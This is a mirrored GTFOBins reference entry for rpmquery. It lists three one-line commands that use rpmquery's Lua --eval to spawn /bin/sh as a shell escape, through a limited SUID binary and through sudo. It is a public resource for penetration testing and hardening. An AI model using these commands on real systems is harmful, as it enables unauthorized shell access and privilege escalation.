1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
GTFOBins.github.io/_gtfobins/rpmquery.md
2021-01-10 18:27:30 +01:00

236 B

functions
shell limited-suid sudo
code
rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
code
./rpmquery --eval '%{lua:os.execute("/bin/sh")}'
code
sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'